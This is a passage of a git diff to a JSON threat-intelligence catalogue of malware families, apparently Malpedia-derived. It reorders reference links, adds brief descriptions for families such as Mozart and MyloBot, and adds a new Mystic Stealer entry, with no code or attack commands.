"https://github.com/Finch4/Malware-Analysis-Reports/tree/main/MountLocker", - "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", "https://www.bleepingcomputer.com/news/security/biotech-research-firm-miltenyi-biotec-hit-by-ransomware-data-leaked/", - "https://blogs.blackberry.com/en/2021/11/zebra2104", + "https://securityintelligence.com/posts/itg23-crypters-cooperation-between-cybercriminal-groups/", + "https://intel471.com/blog/how-cybercriminals-create-turbulence-for-the-transportation-industry", "https://news.sophos.com/en-us/2021/03/31/sophos-mtr-in-real-time-what-is-astro-locker-team/", - "https://www.cybereason.com/blog/cybereason-vs.-quantum-locker-ransomware", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-virtual-machines", + "https://www.bleepingcomputer.com/news/security/mount-locker-ransomware-joins-the-multi-million-dollar-ransom-game/", + "https://chuongdong.com/reverse%20engineering/2021/05/23/MountLockerRansomware/", + "https://securityscorecard.pathfactory.com/research/quantum-ransomware", + "https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/", + "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", + "https://www.trendmicro.com/en_us/research/21/j/ransomware-operators-found-using-new-franchise-business-model.html", + "https://kienmanowar.wordpress.com/2021/08/04/quicknote-mountlocker-some-pseudo-code-snippets/", + "https://dissectingmalwa.re/between-a-rock-and-a-hard-place-exploring-mount-locker-ransomware.html", + "https://blogs.blackberry.com/en/2021/11/zebra2104", + "https://community.riskiq.com/article/47766fbd", + "https://www.crowdstrike.com/blog/prophet-spider-exploits-oracle-weblogic-to-facilitate-ransomware-activity/", + "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v", + "https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf", + "https://www.microsoft.com/en-us/security/blog/2022/10/25/dev-0832-vice-society-opportunistic-ransomware-campaigns-impacting-us-education-sector/", + "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", "https://www.intezer.com/blog/malware-analysis/how-threat-actors-abuse-lnk-files/", "https://blogs.blackberry.com/en/2020/12/mountlocker-ransomware-as-a-service-offers-double-extortion-capabilities-to-affiliates", - "https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf", - "https://www.guidepointsecurity.com/mount-locker-ransomware-steps-up-counter-ir-capabilities/", - "https://www.microsoft.com/en-us/security/blog/2022/10/25/dev-0832-vice-society-opportunistic-ransomware-campaigns-impacting-us-education-sector/", - "https://www.bleepingcomputer.com/news/security/mount-locker-ransomware-joins-the-multi-million-dollar-ransom-game/", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-virtual-machines", - "https://community.riskiq.com/article/47766fbd", + "https://github.com/Finch4/Malware-Analysis-Reports/tree/main/MountLocker", + "https://securityintelligence.com/posts/trickbot-conti-crypters-where-are-they-now/", "https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/", - "https://chuongdong.com/reverse%20engineering/2021/05/23/MountLockerRansomware/", - "https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/", - "https://securityscorecard.pathfactory.com/research/quantum-ransomware", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://www.guidepointsecurity.com/mount-locker-ransomware-steps-up-counter-ir-capabilities/", "https://www.bleepingcomputer.com/news/security/mount-locker-ransomware-now-targets-your-turbotax-tax-returns/", - "https://securityintelligence.com/posts/itg23-crypters-cooperation-between-cybercriminal-groups/", - "https://kienmanowar.wordpress.com/2021/08/04/quicknote-mountlocker-some-pseudo-code-snippets/", - "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v", - "https://www.crowdstrike.com/blog/prophet-spider-exploits-oracle-weblogic-to-facilitate-ransomware-activity/", - "https://dissectingmalwa.re/between-a-rock-and-a-hard-place-exploring-mount-locker-ransomware.html", - "https://www.trendmicro.com/en_us/research/21/j/ransomware-operators-found-using-new-franchise-business-model.html" + "https://www.cybereason.com/blog/cybereason-vs.-quantum-locker-ransomware", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf" ], "synonyms": [ "DagonLocker", @@ -34619,7 +36213,7 @@ "value": "Moure" }, { - "description": "", + "description": "According to PCrisk, Mozart is malicious software that allows attackers (cyber criminals) to execute various commands on an infected computer through the DNS protocol. This communication method helps cyber criminals to avoid detection via security software. Mozart is categorized as a malware loader and executes commands that cause download and installation of malicious software.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mozart", @@ -34637,8 +36231,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mpkbot", - "https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf", - "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/" + "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/", + "https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf" ], "synonyms": [ "MPK" @@ -34653,6 +36247,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mqsttang", + "https://blog.sekoia.io/my-teas-not-cold-an-overview-of-china-cyber-threat/", "https://www.welivesecurity.com/2023/03/02/mqsttang-mustang-panda-latest-backdoor-treads-new-ground-qt-mqtt/" ], "synonyms": [ @@ -34720,8 +36315,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.multigrain_pos", - "https://www.fireeye.com/blog/threat-research/2016/04/multigrain_pointo.html", - "https://www.pandasecurity.com/mediacenter/malware/multigrain-malware-pos/" + "https://www.pandasecurity.com/mediacenter/malware/multigrain-malware-pos/", + "https://www.fireeye.com/blog/threat-research/2016/04/multigrain_pointo.html" ], "synonyms": [], "type": [] @@ -34748,10 +36343,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.murofet", - "https://www.secureworks.com/research/evolution-of-the-gold-evergreen-threat-group", + "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf", "https://www.wired.com/2017/03/russian-hacker-spy-botnet/", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf", - "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf" + "https://www.secureworks.com/research/evolution-of-the-gold-evergreen-threat-group", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf" ], "synonyms": [], "type": [] @@ -34777,10 +36372,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mydogs", - "https://www.pwc.co.uk/issues/cyber-security-services/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-1.htmlhttps://www.pwc.co.uk/issues/cyber-security-data-privacy/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-2.html", - "https://www.virusbulletin.com/virusbulletin/2020/03/vb2019-paper-kimsuky-group-tracking-king-spearphishing/", "https://www.pwc.co.uk/issues/cyber-security-data-privacy/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-2.html", - "https://www.pwc.co.uk/issues/cyber-security-services/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-1.html" + "https://www.pwc.co.uk/issues/cyber-security-services/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-1.html", + "https://www.virusbulletin.com/virusbulletin/2020/03/vb2019-paper-kimsuky-group-tracking-king-spearphishing/", + "https://www.pwc.co.uk/issues/cyber-security-services/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-1.htmlhttps://www.pwc.co.uk/issues/cyber-security-data-privacy/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-2.html" ], "synonyms": [], "type": [] @@ -34793,11 +36388,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mydoom", - "https://www.malware-traffic-analysis.net/2018/12/19/index.html", + "https://www.giac.org/paper/gcih/619/mydoom-backdoor/106503", "https://www.giac.org/paper/gcih/568/mydoom-dom-anlysis-mydoom-virus/106069", - "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf", "http://ivanlef0u.fr/repo/madchat/vxdevl/papers/analysis/mydoom_b_analysis.pdf", - "https://www.giac.org/paper/gcih/619/mydoom-backdoor/106503" + "https://www.malware-traffic-analysis.net/2018/12/19/index.html", + "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf" ], "synonyms": [ "Mimail", @@ -34813,12 +36408,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mykings_spreader", - "http://blog.netlab.360.com/mykings-the-botnet-behind-multiple-active-spreading-botnets/", - "http://download.ahnlab.com/kr/site/library/[AhnLab]Analysis%20Report_MyKings%20Botnet.pdf", - "https://www.proofpoint.com/us/threat-insight/post/smominru-monero-mining-botnet-making-millions-operators", - "https://sophos.files.wordpress.com/2019/12/mykings_report_final.pdf", "https://decoded.avast.io/janrubin/the-king-is-dead-long-live-mykings/", - "https://blog.talosintelligence.com/2020/07/valak-emerges.html" + "https://www.proofpoint.com/us/threat-insight/post/smominru-monero-mining-botnet-making-millions-operators", + "https://blog.talosintelligence.com/2020/07/valak-emerges.html", + "http://blog.netlab.360.com/mykings-the-botnet-behind-multiple-active-spreading-botnets/", + "https://sophos.files.wordpress.com/2019/12/mykings_report_final.pdf", + "http://download.ahnlab.com/kr/site/library/[AhnLab]Analysis%20Report_MyKings%20Botnet.pdf" ], "synonyms": [], "type": [] @@ -34827,17 +36422,17 @@ "value": "MyKings Spreader" }, { - "description": "", + "description": "According to PCrisk, MyloBot is a high-risk trojan-type virus that allows cyber criminals to control the infected machine. MyloBot can be considered as a botnet, since all infected computers are connected to a single network. Depending on cyber criminals' goals, infected machines might be misused or have additional infections applied.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mylobot", - "http://blog.talosintelligence.com/2017/10/threat-round-up-1020-1017.html", "https://www.deepinstinct.com/2018/06/20/meet-mylobot-a-new-highly-sophisticated-never-seen-before-botnet-thats-out-in-the-wild/", + "http://www.freebuf.com/column/153424.html", "https://www.bitsight.com/blog/mylobot-investigating-proxy-botnet", "https://blogs.akamai.com/sitr/2021/01/detecting-mylobot-unseen-dga-based-malware-using-deep-learning.html", "https://blog.centurylink.com/mylobot-continues-global-infections/", "https://github.com/360netlab/DGA/issues/36", - "http://www.freebuf.com/column/153424.html" + "http://blog.talosintelligence.com/2017/10/threat-round-up-1020-1017.html" ], "synonyms": [ "FakeDGA", @@ -34861,6 +36456,19 @@ "uuid": "c9b5b0b2-45af-43f2-8eb4-e13493c1342e", "value": "MysterySnail" }, + { + "description": "According to ZScaler, a new information stealer that was first advertised in April 2023, capable of stealing credentials from nearly 40 web browsers and more than 70 browser extensions, also targeting cryptocurrency wallets, Steam, and Telegram. The code is heavily obfuscated making use of polymorphic string obfuscation, hash-based import resolution, and runtime calculation of constants.\r\nMystic implements a custom binary protocol that is encrypted with RC4.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mystic_stealer", + "https://www.zscaler.com/blogs/security-research/mystic-stealer" + ], + "synonyms": [], + "type": [] + }, + "uuid": "226a9241-e4de-49d0-bb30-4550221f3f9f", + "value": "Mystic Stealer" + }, { "description": "", "meta": { @@ -34881,10 +36489,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.n40", - "http://blog.en.elevenpaths.com/2018/05/new-report-malware-attacks-chilean.html", + "https://www.slideshare.net/elevenpaths/n40-the-botnet-created-in-brazil-which-evolves-to-attack-the-chilean-banking-sector", "https://socprime.com/en/news/attackers-exploit-dll-hijacking-to-bypass-smartscreen/", - "http://reversingminds-blog.logdown.com/posts/7807545-analysis-of-advanced-brazilian-banker-malware", - "https://www.slideshare.net/elevenpaths/n40-the-botnet-created-in-brazil-which-evolves-to-attack-the-chilean-banking-sector" + "http://blog.en.elevenpaths.com/2018/05/new-report-malware-attacks-chilean.html", + "http://reversingminds-blog.logdown.com/posts/7807545-analysis-of-advanced-brazilian-banker-malware" ], "synonyms": [], "type": [] @@ -34909,11 +36517,13 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nachocheese", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-239b", "https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/pf/apt/rpt-apt38-2018.pdf", - "https://www.welivesecurity.com/2017/02/16/demystifying-targeted-malware-used-polish-banks/", - "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf", + "https://raw.githubusercontent.com/eric-erki/APT_CyberCriminal_Campagin_Collections/master/2017/2017.05.30.Lazarus_Arisen/Group-IB_Lazarus.pdf", + "https://www.virusbulletin.com/uploads/pdf/magazine/2018/VB2018-Kalnai-Poslusny.pdf", "https://baesystemsai.blogspot.com/2017/02/lazarus-false-flag-malware.html", - "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-239b" + "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf", + "https://www.welivesecurity.com/2017/02/16/demystifying-targeted-malware-used-polish-banks/" ], "synonyms": [ "Cyruslish", @@ -34943,9 +36553,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.naikon", + "https://securelist.com/analysis/publications/69953/the-naikon-apt/", "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf", - "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf", - "https://securelist.com/analysis/publications/69953/the-naikon-apt/" + "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf" ], "synonyms": [ "Sacto" @@ -34960,59 +36570,59 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nanocore", - "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/image-file-trickery-part-ii-fake-icon-delivers-nanocore/", - "https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/", - "https://securityintelligence.com/posts/roboski-global-recovery-automation/", - "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf", - "https://goggleheadedhacker.com/blog/post/11", - "https://www.ic3.gov/media/news/2020/200917-1.pdf", - "https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter", - "https://medium.com/@mariohenkel/decrypting-nanocore-config-and-dump-all-plugins-f4944bfaba52?sk=00be46bc5bf99e8ab67369152ceb0332", - "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage", - "https://blog.talosintelligence.com/2020/02/coronavirus-themed-malware.html", - "https://www.cisecurity.org/insights/blog/top-10-malware-march-2022", - "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/how-cybercriminals-abuse-cloud-tunneling-services", - "https://www.secureworks.com/research/threat-profiles/cobalt-trinity", - "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html", - "https://community.riskiq.com/article/24759ad2", - "https://intel471.com/blog/privateloader-malware", - "https://www.secureworks.com/research/darktortilla-malware-analysis", - "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", - "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf", - "https://zero2auto.com/2020/06/07/dealing-with-obfuscated-macros/", - "https://malwareindepth.com/defeating-nanocore-and-cypherit/", - "https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware", - "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/", - "https://threatrecon.nshc.net/2019/09/19/sectorh01-continues-abusing-web-services/", - "https://github.com/threatland/TL-TROJAN/tree/master/TL.RAT/RAT.Win.Nanocore", - "https://www.proofpoint.com/us/blog/threat-insight/threat-actor-profile-ta2719-uses-colorful-lures-deliver-rats-local-languages", - "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/", - "https://blog.talosintelligence.com/2021/04/a-year-of-fajan-evolution-and-bloomberg.html", - "https://community.riskiq.com/article/ade260c6", - "https://blog.morphisec.com/syk-crypter-discord", - "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html", - "https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols", - "https://medium.com/@M3HS1N/malware-analysis-nanocore-rat-6cae8c6df918", - "https://blog.360totalsecurity.com/en/bayworld-event-cyber-attack-against-foreign-trade-industry/", - "https://medium.com/@the_abjuri5t/nanocore-rat-hunting-guide-cb185473c1e0", - "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord", - "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage", - "https://us-cert.cisa.gov/ncas/alerts/aa20-345a", - "https://www.gdatasoftware.com/blog/global-pandemic-remcos-tesla-netwire", - "https://www.zscaler.com/blogs/research/multistage-freedom-loader-used-spread-azorult-and-nanocore-rat", - "https://www.trendmicro.com/en_us/research/21/k/campaign-abusing-rats-uses-fake-websites.html", - "https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors", "https://www.crowdstrike.com/blog/weaponizing-disk-image-files-analysis/", - "https://mp.weixin.qq.com/s/mstwBMkS0G3Et4GOji2mwA", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/elfin-indictments-iran-espionage", - "https://www.proofpoint.com/us/blog/threat-insight/new-threat-actor-spoofs-philippine-government-covid-19-health-data-widespread", - "https://blog.talosintelligence.com/2022/01/nanocore-netwire-and-asyncrat-spreading.html", - "https://www.bleepingcomputer.com/news/security/nanocore-rat-author-gets-33-months-in-prison/", - "https://www.trendmicro.com/en_us/research/21/i/Water-Basilisk-Uses-New-HCrypt-Variant-to-Flood-Victims-with-RAT-Payloads.html", - "https://medium.com/@mariohenkel/decrypting-nanocore-config-and-dump-all-plugins-f4944bfaba52", - "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf", "https://assets.virustotal.com/reports/2021trends.pdf", - "https://blog.360totalsecurity.com/en/vendetta-new-threat-actor-from-europe/" + "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/how-cybercriminals-abuse-cloud-tunneling-services", + "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/", + "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage", + "https://www.bleepingcomputer.com/news/security/nanocore-rat-author-gets-33-months-in-prison/", + "https://www.proofpoint.com/us/blog/threat-insight/threat-actor-profile-ta2719-uses-colorful-lures-deliver-rats-local-languages", + "https://www.secureworks.com/research/darktortilla-malware-analysis", + "https://medium.com/@mariohenkel/decrypting-nanocore-config-and-dump-all-plugins-f4944bfaba52?sk=00be46bc5bf99e8ab67369152ceb0332", + "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", + "https://www.trendmicro.com/en_us/research/21/k/campaign-abusing-rats-uses-fake-websites.html", + "https://goggleheadedhacker.com/blog/post/11", + "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord", + "https://github.com/threatland/TL-TROJAN/tree/master/TL.RAT/RAT.Win.Nanocore", + "https://blog.360totalsecurity.com/en/vendetta-new-threat-actor-from-europe/", + "https://community.riskiq.com/article/24759ad2", + "https://community.riskiq.com/article/ade260c6", + "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf", + "https://www.zscaler.com/blogs/research/multistage-freedom-loader-used-spread-azorult-and-nanocore-rat", + "https://zero2auto.com/2020/06/07/dealing-with-obfuscated-macros/", + "https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter", + "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html", + "https://www.ic3.gov/media/news/2020/200917-1.pdf", + "https://www.secureworks.com/research/threat-profiles/cobalt-trinity", + "https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols", + "https://blog.talosintelligence.com/2020/02/coronavirus-themed-malware.html", + "https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors", + "https://intel471.com/blog/privateloader-malware", + "https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/", + "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html", + "https://blog.talosintelligence.com/2021/04/a-year-of-fajan-evolution-and-bloomberg.html", + "https://medium.com/@M3HS1N/malware-analysis-nanocore-rat-6cae8c6df918", + "https://securityintelligence.com/posts/roboski-global-recovery-automation/", + "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage", + "https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware", + "https://blog.morphisec.com/syk-crypter-discord", + "https://blog.talosintelligence.com/2022/01/nanocore-netwire-and-asyncrat-spreading.html", + "https://medium.com/@the_abjuri5t/nanocore-rat-hunting-guide-cb185473c1e0", + "https://malwareindepth.com/defeating-nanocore-and-cypherit/", + "https://blog.360totalsecurity.com/en/bayworld-event-cyber-attack-against-foreign-trade-industry/", + "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf", + "https://mp.weixin.qq.com/s/mstwBMkS0G3Et4GOji2mwA", + "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/", + "https://medium.com/@mariohenkel/decrypting-nanocore-config-and-dump-all-plugins-f4944bfaba52", + "https://www.cisecurity.org/insights/blog/top-10-malware-march-2022", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/image-file-trickery-part-ii-fake-icon-delivers-nanocore/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/elfin-indictments-iran-espionage", + "https://threatrecon.nshc.net/2019/09/19/sectorh01-continues-abusing-web-services/", + "https://www.trendmicro.com/en_us/research/21/i/Water-Basilisk-Uses-New-HCrypt-Variant-to-Flood-Victims-with-RAT-Payloads.html", + "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf", + "https://www.proofpoint.com/us/blog/threat-insight/new-threat-actor-spoofs-philippine-government-covid-19-health-data-widespread", + "https://us-cert.cisa.gov/ncas/alerts/aa20-345a", + "https://www.gdatasoftware.com/blog/global-pandemic-remcos-tesla-netwire" ], "synonyms": [ "Nancrat", @@ -35053,8 +36663,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.narilam", - "http://contagiodump.blogspot.com/2012/12/nov-2012-w32narilam-sample.html", - "https://www.symantec.com/connect/blogs/w32narilam-business-database-sabotage" + "https://www.symantec.com/connect/blogs/w32narilam-business-database-sabotage", + "http://contagiodump.blogspot.com/2012/12/nov-2012-w32narilam-sample.html" ], "synonyms": [], "type": [] @@ -35067,9 +36677,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nautilus", - "https://www.secureworks.com/research/threat-profiles/iron-hunter", "https://www.ncsc.gov.uk/alerts/turla-group-malware", - "https://www.ncsc.gov.uk/news/turla-group-exploits-iran-apt-to-expand-coverage-of-victims" + "https://www.ncsc.gov.uk/news/turla-group-exploits-iran-apt-to-expand-coverage-of-victims", + "https://www.secureworks.com/research/threat-profiles/iron-hunter" ], "synonyms": [], "type": [] @@ -35083,9 +36693,9 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.navrat", "https://norfolkinfosec.com/how-to-analyzing-a-malicious-hangul-word-processor-document-from-a-dprk-threat-actor-group/", - "https://www.youtube.com/watch?v=rfzmHjZX70s", - "https://blog.talosintelligence.com/2018/05/navrat.html?m=1", "https://i.blackhat.com/asia-21/Friday-Handouts/as-21-Kuo-We-Are-About-To-Land-How-CloudDragon-Turns-A-Nightmare-Into-Reality.pdf", + "https://blog.talosintelligence.com/2018/05/navrat.html?m=1", + "https://www.youtube.com/watch?v=rfzmHjZX70s", "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf" ], "synonyms": [ @@ -35101,14 +36711,14 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ncctrojan", - "https://vblocalhost.com/uploads/VB2020-Ozawa-etal.pdf", - "https://www.youtube.com/watch?v=1WfPlgtfWnQ", "https://insight-jp.nttsecurity.com/post/102gr6l/ta428ncctrojan", - "https://sebdraven.medium.com/actor-behind-operation-lagtime-targets-russia-f8c277dc52a9", + "https://www.youtube.com/watch?v=1WfPlgtfWnQ", "https://vblocalhost.com/uploads/VB2020-20.pdf", "https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-Targeted-attack-on-industrial-enterprises-and-public-institutions-En.pdf", + "https://sebdraven.medium.com/actor-behind-operation-lagtime-targets-russia-f8c277dc52a9", "https://www.socinvestigation.com/chinese-new-backdoor-deployed-for-cyberespionage/", - "https://twitter.com/ESETresearch/status/1441139057682104325?s=20" + "https://twitter.com/ESETresearch/status/1441139057682104325?s=20", + "https://vblocalhost.com/uploads/VB2020-Ozawa-etal.pdf" ], "synonyms": [], "type": [] @@ -35121,11 +36731,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nebulae", - "https://www.bleepingcomputer.com/news/security/cyberspies-target-military-organizations-with-new-nebulae-backdoor/", "https://www.securityweek.com/chinese-cyberspies-target-military-organizations-asia-new-malware", "https://twitter.com/SyscallE/status/1390339497804636166", - "https://www.bitdefender.com/files/News/CaseStudies/study/396/Bitdefender-PR-Whitepaper-NAIKON-creat5397-en-EN.pdf", - "https://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos" + "https://www.bleepingcomputer.com/news/security/cyberspies-target-military-organizations-with-new-nebulae-backdoor/", + "https://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos", + "https://www.bitdefender.com/files/News/CaseStudies/study/396/Bitdefender-PR-Whitepaper-NAIKON-creat5397-en-EN.pdf" ], "synonyms": [], "type": [] @@ -35138,27 +36748,27 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.necurs", - "https://blogs.microsoft.com/on-the-issues/2020/03/10/necurs-botnet-cyber-crime-disrupt/", - "https://www.proofpoint.com/us/threat-insight/post/holiday-lull-not-so-much", - "http://blog.talosintelligence.com/2017/03/necurs-diversifies.html", - "https://blog.trendmicro.com/trendlabs-security-intelligence/necurs-evolves-to-evade-spam-detection-via-internet-shortcut-file/", - "https://www.blueliv.com/wp-content/uploads/2018/07/Blueliv-Necurs-report-2017.pdf", - "http://www.secureworks.com/research/threat-profiles/gold-riverview", - "https://bin.re/blog/the-dgas-of-necurs/", - "https://blog.avast.com/botception-with-necurs-botnet-distributes-script-with-bot-capabilities-avast-threat-labs", - "https://blog.trendmicro.com/trendlabs-security-intelligence/the-new-face-of-necurs-noteworthy-changes-to-necurs-behaviors", - "https://www.secureworks.com/research/threat-profiles/gold-riverview", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf", - "https://www.trustwave.com/Resources/SpiderLabs-Blog/Necurs-Recurs/", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", - "https://www.shadowserver.org/news/has-the-sun-set-on-the-necurs-botnet/", - "https://www.cert.pl/en/news/single/necurs-hybrid-spam-botnet/", "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/", - "https://intel471.com/blog/a-brief-history-of-ta505", - "https://lokalhost.pl/txt/peering.into.spam.botnets.VirusBulletin2017.pdf", - "https://research.nccgroup.com/2021/12/01/tracking-a-p2p-network-related-with-ta505/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", + "https://blog.trendmicro.com/trendlabs-security-intelligence/necurs-evolves-to-evade-spam-detection-via-internet-shortcut-file/", + "https://www.proofpoint.com/us/threat-insight/post/holiday-lull-not-so-much", "https://cofense.com/necurs-targeting-banks-pub-file-drops-flawedammyy/", - "https://www.bitsighttech.com/blog/necurs-proxy-module-with-ddos-features" + "https://lokalhost.pl/txt/peering.into.spam.botnets.VirusBulletin2017.pdf", + "https://blog.trendmicro.com/trendlabs-security-intelligence/the-new-face-of-necurs-noteworthy-changes-to-necurs-behaviors", + "http://blog.talosintelligence.com/2017/03/necurs-diversifies.html", + "https://www.shadowserver.org/news/has-the-sun-set-on-the-necurs-botnet/", + "https://blogs.microsoft.com/on-the-issues/2020/03/10/necurs-botnet-cyber-crime-disrupt/", + 